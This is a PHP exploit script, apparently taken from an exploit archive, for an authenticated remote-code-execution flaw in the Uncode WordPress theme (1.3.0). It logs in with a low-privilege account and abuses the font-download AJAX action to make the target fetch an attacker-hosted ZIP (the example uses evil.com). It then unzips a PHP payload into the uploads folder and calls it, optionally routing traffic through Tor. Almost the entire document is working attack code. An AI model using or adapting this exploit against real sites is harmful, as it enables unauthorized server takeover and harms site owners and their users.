/exploits/php/webapps/39895.php
PHP | 152 lines | 108 code | 30 blank | 14 comment | 14 complexity | 2984dfea9d986e9f155179b5873dafaa MD5 | raw file
Possible License(s): GPL-2.0
- <?php
- /**
- * Exploit Title: Uncode WP Theme RCE Expoit
- * Google Dork:
- * Exploit Author: wp0Day.com <contact@wp0day.com>
- * Vendor Homepage:
- * Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220
- * Version: 1.3.0 possible 1.3.1
- * Tested on: Debian 8, PHP 5.6.17-3
- * Type: RCE, Arbirary file UPLOAD, (Low Authenticated )
- * Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400]
- */
-
-
- require_once('curl.php');
- //OR
- //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
- $curl = new CurlWrapper();
-
-
- $options = getopt("t:u:p:f:",array('tor:'));
- print_r($options);
- $options = validateInput($options);
-
- if (!$options){
- showHelp();
- }
-
- if ($options['tor'] === true)
- {
- echo " ### USING TOR ###\n";
- echo "Setting TOR Proxy...\n";
- $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
- $curl->addOption(CURLOPT_PROXYTYPE,7);
- echo "Checking IPv4 Address\n";
- $curl->get('https://dynamicdns.park-your-domain.com/getip');
- echo "Got IP : ".$curl->getResponse()."\n";
- echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
- $answer = fgets(fopen ("php://stdin","r"));
- if(trim($answer) != 'wololo'){
- die("Aborting!\n");
- }
- echo "OK...\n";
- }
-
-
- function logIn(){
- global $curl, $options;
- file_put_contents('cookies.txt',"\n");
- $curl->setCookieFile('cookies.txt');
- $curl->get($options['t']);
- $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
- $curl->post($options['t'].'/wp-login.php', $data);
- $status = $curl->getTransferInfo('http_code');
- if ($status !== 302){
- echo "Login probably failed, aborting...\n";
- echo "Login response saved to login.html.\n";
- die();
- }
- file_put_contents('login.html',$curl->getResponse());
-
-
- }
-
- function exploit(){
- global $curl, $options;
- echo "Generateing payload.\n";
- $data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']);
- echo "Sending payload\n";
- $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
- $resp = $curl->getResponse();
- echo "Eco response: ".$resp."\n";
- $resp = json_decode($resp,true);
- if ($resp['success'] === 'Font downloaded and extracted successfully.'){
- echo "Response ok, calling RCE\n";
- $file_path = parse_url($options['f']);
- $remote_file_info = pathinfo($file_path['path']);
- $zip_file_name = $remote_file_info['basename'];
- $zip_file_name_php = str_replace('.zip', '.php', $zip_file_name);
- $url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php;
- echo 'Url: '. $url."\n";
- //POC Test mode
- if ($file_path['host'] == 'wp0day.com'){
- echo "Exploit test mode on\n";
- $rnd = rand();
- echo "Rand $rnd, MD5: ".md5($rnd)."\n";
- $url = $url . '?poc='.$rnd;
- }
- $curl->get($url);
- echo "RCE Response:";
- echo $curl->getResponse()."\n\n";
- }
- }
-
-
- logIn();
- exploit();
-
-
-
- function validateInput($options){
-
- if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
- return false;
- }
- if ( !isset($options['u']) ){
- return false;
- }
- if ( !isset($options['p']) ){
- return false;
- }
- if ( !isset($options['f']) ){
- return false;
- }
- if (!preg_match('~/$~',$options['t'])){
- $options['t'] = $options['t'].'/';
- }
-
- $options['tor'] = isset($options['tor']);
-
- return $options;
- }
-
-
- function showHelp(){
- global $argv;
- $help = <<<EOD
-
- Uncode WP Theme RCE Expoit
-
- Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -f [URL]
-
- *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
-
- [TARGET_URL] http://localhost/wordpress/
- [URL] It must be ZIP file. It gets unzipped into /wp-content/uploads/uncode-fonts/[some.zip]/files folder
- Example: rce.php -> zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php
-
-
-
- Examples:
- php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip
-
- Misc:
- CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
- @link http://github.com/svyatov/CurlWrapper
- @license http://www.opensource.org/licenses/mit-license.html MIT License
-
- EOD;
- echo $help."\n\n";
- die();
- }